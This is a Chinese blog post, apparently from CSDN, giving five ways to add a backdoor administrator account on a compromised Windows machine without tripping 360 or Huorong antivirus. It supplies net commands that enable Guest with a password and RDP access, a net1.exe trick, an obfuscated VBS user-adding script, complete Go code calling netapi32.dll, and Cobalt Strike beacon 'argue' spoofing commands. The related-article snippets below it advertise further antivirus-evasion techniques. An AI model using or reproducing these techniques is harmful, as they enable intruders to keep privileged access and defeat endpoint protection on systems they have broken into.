绕过杀软添加用户

最新推荐文章于 2023-12-07 15:17:43 发布
最新推荐文章于 2023-12-07 15:17:43 发布
阅读量1.8k 收藏 5
点赞数 3
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63124284/article/details/127979977
版权

方法0、直接运行神器

360shellcode.zip

github可搜

方法1、激活GUEST用户

比较好用,试过很多次杀软都不拦截

net   user  guest  /active:yes   
net   user  guest   Aa123456.
net   localgroup  administrators  guest   /add
net   localgroup "Remote  Desktop Users"  guest  /add

方法2、net1绕过

net1.exe在C:/windows/system32下

进入到目录下面,此时生成一个asd.txt

 1de6516f4553171384cc8e5ace7be6c0.png

此时的asd.txt就和net 一样了,可以执行net user

不会触发火绒告警(有的主机会有的主机不会不知道为啥)

22c15886acae8582dc4ddf91432256ee.png

方法3、VBS API脚本

wscript.exe add.vbs 无法绕过火绒(会被当做adduser病毒干掉)

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","iiice")
od.SetPassword "123456"
od.SetInfo
Set of=GetObject(os&"/iiice",user)
oe.add os&"/admin"

 但是我们只要简单的尝试混淆即可绕过

Set wsnetwork=CreateObject("WS"&"CR"&"IPT"&"."&"NET"&"WO"&"RK") 
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","iiice")
Const strPassword = "123456"
od.SetPassword strPassword
od.SetInfo
Set of=GetObject(os&"/iiice",user)
oe.add os&"/iiice"

方法4、使用windows底层API

原理是使用windows本地的netapi32.dll来绕过杀软的监测

package main

import (
    "fmt"
    "os"
    "syscall"
    "unsafe"
)

//参考如下
//https://docs.microsoft.com/zh-cn/windows/win32/api/lmaccess/nf-lmaccess-netuseradd/
//https://github.com/CodyGuo/xcgui/blob/master/doc/cToGo.go
//https://github.com/iamacarpet/go-win64api/blob/master/users.go
//https://git.itch.ovh/itchio/ox/-/blob/ec75be15423d72ab9691a3318ecce3feee67b19b/syscallex/netapi32_windows.go
//https://pkg.go.dev/github.com/itchio/ox/syscallex#NetUserAdd
type USER_INFO_1 struct {
    Usri1_name         *uint16
    Usri1_password     *uint16
    Usri1_password_age uint32 //可忽略
    Usri1_priv         uint32
    Usri1_home_dir     *uint16
    Usri1_comment      *uint16
    Usri1_flags        uint32
    Usri1_script_path  *uint16
}
type LOCALGROUP_MEMBERS_INFO_3 struct {
    Lgrmi3_domainandname *uint16
}

const (
    USER_PRIV_GUEST            = 0
    USER_PRIV_USER             = 1
    USER_PRIV_ADMIN            = 2
    USER_UF_SCRIPT             = 1
    USER_UF_NORMAL_ACCOUNT     = 512
    USER_UF_DONT_EXPIRE_PASSWD = 65536
    //parmErr                     = 0
    NET_API_STATUS_NERR_Success = 0
)

type User struct {
    username string
    password string
}

func main() {
    // 请更改此处用户名密码
    info := User{
        username: "test",
        password: "123456",
    }

    r, err := NetUserAdd(info.username, info.password)
    if err != nil {
        fmt.Println(err)
    }
    fmt.Println(r)
    //if r == true {
    //  _, err := AddLocalGroup("test", "Administrators")
    //  if err != nil {
    //      fmt.Println(err)
    //  }
    //}
}

func NetUserAdd(user string, pass string) (bool, error) {
    var parmErr uint32
    parmErr = uint32(0)

    username := UtfToStr(user)
    password := UtfToStr(pass)
    userinfo := USER_INFO_1{
        Usri1_name:     username,
        Usri1_password: password,
        Usri1_priv:     USER_PRIV_USER,
        Usri1_flags:    USER_UF_SCRIPT | USER_UF_NORMAL_ACCOUNT | USER_UF_DONT_EXPIRE_PASSWD,
        //Usri1_home_dir:    UtfToStr(""),
        //Usri1_comment:     UtfToStr("test测试用户"),
        //Usri1_script_path: UtfToStr(""),
    }

    netapi, err := syscall.LoadLibrary("netapi32.dll")
    if err != nil {
        panic("dll引用失败")
    }
    AddUser, err := syscall.GetProcAddress(netapi, "NetUserAdd")
    result, _, _ := syscall.Syscall6(AddUser,
        4,
        uintptr(0),         //server
        uintptr(uint32(1)), //lever
        uintptr(unsafe.Pointer(&userinfo)),
        uintptr(unsafe.Pointer(&parmErr)), 0, 0,
    )
    //令必须使用管理员权限才能添加用户
    if result != NET_API_STATUS_NERR_Success {
        return false, fmt.Errorf("添加失败")
    } else {
        _, err = AddLocalGroup(user, "Administrators", netapi)
        if err != nil {
            fmt.Println(err)
        }
        return true, fmt.Errorf("添加成功%s:%s", user, pass)

    }

}

func AddLocalGroup(user, group string, netapi syscall.Handle) (bool, error) {
    work, _ := os.Hostname()
    WorkStation := UtfToStr(work + `\` + user)
    GroupName := UtfToStr(group)
    var uArray = make([]LOCALGROUP_MEMBERS_INFO_3, 1)
    uArray[0] = LOCALGROUP_MEMBERS_INFO_3{
        Lgrmi3_domainandname: WorkStation,
    }
    ALG, _ := syscall.GetProcAddress(netapi, "NetLocalGroupAddMembers")
    result, _, _ := syscall.Syscall6(ALG, 5,
        uintptr(0),                          // servername
        uintptr(unsafe.Pointer(GroupName)),  // group name
        uintptr(uint32(3)),                  // level
        uintptr(unsafe.Pointer(&uArray[0])), // user array.
        uintptr(uint32(len(uArray))), 0)
    if result != NET_API_STATUS_NERR_Success {
        return false, fmt.Errorf("添加管理组失败")
    } else {
        return true, fmt.Errorf("添加管理组Administrators成功")
    }
}
func UtfToStr(str string) *uint16 {
    res, err := syscall.UTF16PtrFromString(str)
    if err != nil {
        panic(err)
    }
    return res
}

方法5、利用CS argue参数欺骗

beacon> argue net1 /bypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypass
beacon> run net1 user betasec 3had0w!@#123 /add 
beacon> run net1 localgroup administrators betasec /add

argue 进程参数欺骗
argue [command] [fake arguments]
argue 命令 假参数 欺骗某个命令参数
argue [command]
argue 命令 取消欺骗某个命令参数

恸.283
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
绕过360创建用户登陆内网3389实战记录
白泽Sec安全实验室
11-21 2753
目标:某集团 通过信息收集:得到通达OA界面 利用通达exp,获得目标主机system权限(多快好省) 查看当前开放端口,发现已经开启3389 那么我们直接创建账户,发现net命令不能不能使用,猜测应该是有杀软防护 Tasklist查看进程,确实存在360 Net命令不能使用,可以使用windwosapi接口方式绕过,但是手上没有现成的编译好的绕过文件(虽然网上有源码)。想到可以尝试使用net1.exe绕过360检测,成功执行命令建账户 连接3389,发现报错? Nmap识别端口指纹,发现并没有
记一次绕过火绒安全提权实战案例1
08-03
记一次绕过火绒安全提权实战案例1
绕过杀毒软件添加账号
Shanfenglan's blog
01-14 6682
文章目录1.使用CS绕过拦截2.使用vbs文件3.参考文章 1.使用CS 使用CS直接用shell添加会被拦截。 绕过拦截 使用argue命令来伪装命令的参数,然后使用run来执行,逻辑是: 以挂起状态启动匹配的进程(使用伪参数) 使用实参更新进程内存 恢复进程 效果如下,且没有被拦截: argue net saldjfoiwjeofijoisfklasjdlfjasdfiowjefoijwoefjoaisjefojsaefoiwejfowef run net user asdf 123 /add
绕过360给目标机器添加账户
最新发布
weixin_65550121的博客
12-07 1238
Beacon 对象文件 (BOF) 是一个已编译的 C 程序,按照约定编写,允许其在 Beacon 进程内执行并使用内部 Beacon API。在BOF中我们是可以通过GetProcAddress,LoadLibraryA,GetModuleHandle 来调用我们想要的windows API。它们在 Beacon 进程内部运行,并且可以使用进程注入块中的可延展的 c2 配置文件来控制内存。其实go函数就是BOF的入口,当你在CS上执行inline-execute命令的时候,就会调用go函数。
杀软工作原理以及如何免杀绕过
Makboli的博客
10-12 1478
【免杀】五分钟简单了解一下免杀马
学习记录:内网穿透+ShellCode+C++语言二次编译 免杀绕过火绒 渗透Win10提取密码
qq_60709081的博客
06-24 1521
攻击机:Kali (虚拟机)靶机: Windows 10 22H2 版本 10.0.19045(物理机)工具:MSF,VS,花生壳通过C++二次编译制作免杀木马,绕过火绒检测,实现对靶机的控制,windows本地提权,获取并破解用户密码。今天又进步了一点点,之后打算去打基础了,一步一步来。但毕竟做任何事都要有些动力的,做一个ScriptsKids反倒可以增加自己的兴趣和动力呢。🎉✨免责声明:本文仅作学习、深研而用,若有犯罪行为,一切后果自负,与本文作者无关。
Windows编程-提升进程权限,以管理权限启动另一个程序
NINE_world的博客
10-04 1272
#include <iostream> #include <windows.h> #include <tchar.h> using namespace std; //提高自己的权限 /* * 这个函数,将进程权限提升成具有调试权限的进程,这个权限应该是进程所能具有的最大权限 * 前提启动这个进程的账户必须是一个管理员,否则没法提升 */ //当fEnable = TRUE 的时候,授予当前进程调试权限 //当fEnable = FALSE 的时候,收回调试权限 //
6月22号 更新免杀壳 过主流杀软
06-22
在IT安全领域,"免杀壳"是一种技术手段,用于绕过反病毒软件(杀软)的检测,使得恶意代码能够逃避检测并成功运行。6月22日更新的这个"免杀壳"可能是一个工具或者技术解决方案,据描述称其更新后的效果“比较BT”,...
免杀补丁过杀毒软件
06-30
免杀补丁是其中的一种手段,通过修改或添加代码,使原本会被杀软识别为恶意的程序得以“隐身”。 2. **免杀原理**:免杀补丁通常会改变恶意软件的哈希值或二进制签名,以防止杀毒软件通过特征码匹配来识别。此外,...
源码免杀培训系列教程1
05-27
而免杀技术则旨在绕过这些防御机制,使恶意程序能够在用户的系统中秘密运行而不被发现。 接着,我们需要了解一些代表性杀软的特性。如卡巴斯基、诺顿、赛门铁克等,它们通常采用启发式扫描、行为分析、云查杀等技术...
绕过360添加用户.mp4
12-05
绕过360添加用户,大家都知道在提权的时候会可能会遇到360.0000000.。。。。。。。。。。。
不死账户 添加无限复活用户
08-07
创建admin$用户,密码任意设置,一步完成,好像360会报警,其他杀软安全通过。 创建用户后,除非重装系统,不然无法删除,每次注销或重启都能复活。
2011最新免杀教程
07-11
【描述】"2011最新免杀教程,过360五引擎,主流杀软"表明该教程的目标是教如何绕过2011年360安全卫士的五个反病毒引擎,并且针对当时的主流杀毒软件。360安全卫士是中国的一款知名免费安全软件,其五引擎可能包括自...
go免杀初探1
08-03
在Windows环境下,免杀的一个关键挑战是如何绕过杀毒软件对shellcode(可以直接执行的机器码)的检测。直接加载shellcode通常会被杀软视为高风险行为,因此,我们需要采取加密和混淆措施来逃避检测。 文章中提到了...
绕过杀软(一)—— PowerShell 进程隐藏与 NetCat进行联动
W小哥
06-11 1918
前提: 通过某些技术手段已 geshell攻击机: 192.168.32.1(win 10)、192.168.32.133(kali) 靶机: 192.168.32.1(win10 WEB网站phpstudy 安装杀软360、电脑管家)因为上线cs、nc联动的命令或者脚本需要使用到 poweshell因为安装了360和火绒的服务器。在执行exe文件的时候杀毒软件会阻止exe运行 如下图执行wxiaoge.exe文件都被360阻止 执行 poweshell 命令会调用到powershell.exe文件也被
Winodws API Tools 加用户
weixin_39251927的博客
11-16 408
指向常量字符串的指针,该字符串指定要在其上执行函数的远程服务器的 DNS 或 NetBIOS 名称。根据官方文档上给的示例进行根据自己的需求修改,官网上使用的是C++,你需要一个C++编译的环境,我这里使用的是。示例代码中我们需要调整servername 为NULL,使用本地计算机,接收用户和密码,后需要加入管理员中。,这让无法通过该方法进行添加用户,删除用户等,这个时候就需要通过调用系统的API来进行操作,来绕过这些。接下来还差一步,需要把这个普通用户的账号提升为管理员权限。则使用本地计算机。
QT使用WindowsAPI NetUserAdd创建系统用户
skyyx2002的博客
08-22 1865
NetUserAdd 添加用户 NetLocalGroupAddMembers 设置用户权限组
通过信任文件绕过火绒
None安全团队
03-08 1631
下班后日常打开我的csgo 看着我空荡荡的列表不禁陷入了沉思 于是想生成一个远控 让我的虚拟机运行下 假装我也有机器上线了 成功生成 但是感觉不太对啊 我的火绒是开启的啊 为啥没有杀掉呢 运行一下成功上线 便想到了 我每次上传文件都会被杀掉 之前有把这个名字的文件加入了信任区 如果文件不存在了 下次你再存放同名的文件的时候 便会直接加入 但是想要知道有哪些文件加入了也是问题 就去找一下他的缓存文件吧 发现在C:\ProgramData\Huorong\Sysdiag\wlf
C语言编写windows用户账户管理
董盼山的专栏
11-21 2902
windows 用户管理函数 包含添加用户,删除用户,枚举用户,获取用户信息 1.添加用户函数 NetUserAdd 2.删除用户函数 NetUserDel 3.枚举用户函数 NetUserEunm 4.将一个用户加入一个本地的组 NetLocalGroupAddMembers ======================================================
python自启动 绕过360_记录一次绕过杀软的过程
06-10
首先,需要注意的是,绕过杀软是一种不道德的行为,同时也是违法的。因此,我们不鼓励或支持这种行为。 其次,关于Python自启动,一般有两种方法: 1. 将Python脚本添加到系统的启动项中。这样,每次开机启动时,系统会自动运行这个脚本。具体步骤如下: - 打开“运行”窗口,输入“shell:startup”,打开启动文件夹。 - 右键点击文件夹中的空白处,选择“新建”->“快捷方式”。 - 在“快捷方式”的目标栏中输入“python.exe 脚本路径”,如“C:\Python27\python.exe D:\test.py”。 - 点击“下一步”,输入一个名称,如“test”,点击“完成”即可。 2. 使用Windows任务计划程序。这样,可以设置脚本在指定的时间自动运行。具体步骤如下: - 打开“控制面板”->“管理工具”->“任务计划程序”。 - 在任务计划程序中,右键点击“任务计划程序库”,选择“创建任务”。 - 在“常规”选项卡中,输入一个名称和描述,选择“不管用户是否登录都要运行”,勾选“使用最高权限运行”。 - 在“触发器”选项卡中,选择“新建”,设置计划的触发条件,如每天、每周等。 - 在“操作”选项卡中,选择“新建”,设置操作为“启动程序”,输入“python.exe 脚本路径”。 - 点击“确定”保存任务。 对于绕过杀软的过程,一般有以下几种方法: 1. 使用FUD(Fully Undetectable)技术,将病毒代码加密或混淆,使其难以被杀软检测到。 2. 使用虚拟机或沙箱环境,在其中运行病毒代码,以避免被杀软检测。 3. 修改病毒代码,使其不再具有病毒行为,从而不被杀软检测到。 4. 手动编写病毒代码,使用未被杀软识别的技术和方法。 需要注意的是,这些方法都存在风险和不道德性质,因此不应该轻易尝试。同时,杀软的主要目的是保护用户安全,因此绕过杀软的行为也可能会对用户造成风险和危害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值